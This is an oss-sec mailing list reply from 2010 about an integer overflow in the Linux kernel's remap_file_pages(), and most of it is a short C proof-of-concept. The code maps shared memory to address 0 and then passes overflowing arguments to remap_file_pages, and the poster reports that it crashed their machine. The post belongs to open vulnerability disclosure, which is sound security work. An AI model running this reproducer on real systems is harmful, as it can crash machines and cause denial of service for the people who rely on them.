oss-sec mailing list archives
Re: kernel: avoid pgoff overflow in remap_file_pages
From: akiphie <akiphie () lavabit com>
Date: Tue, 12 Oct 2010 13:27:39 -0500
On Tuesday 12 October 2010 09:19:29 Eugene Teo wrote:
Thomas Pollet reported an integer overflow issue in remap_file_pages(). While we are able to reproduce the issue, we are unable to find a security impact. If your views differ, do let us know.
This made my computer very sad :(
#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>
int main(int argc, char **argv)
{
int x = shmget(IPC_PRIVATE, 1, IPC_CREAT | IPC_EXCL | 0600);
void *mem = shmat(x, NULL, 0);
mremap(mem, 0x1000, 0x1000, MREMAP_MAYMOVE | MREMAP_FIXED, 0x0);
remap_file_pages((void *) 0xfff, ~0UL, 0, -(~0UL >> 12), 0);
return 0;
}
--
cnu
Current thread:
- kernel: avoid pgoff overflow in remap_file_pages Eugene Teo (Oct 12)
- Re: kernel: avoid pgoff overflow in remap_file_pages Thomas Pollet (Oct 12)
- Re: kernel: avoid pgoff overflow in remap_file_pages akiphie (Oct 12)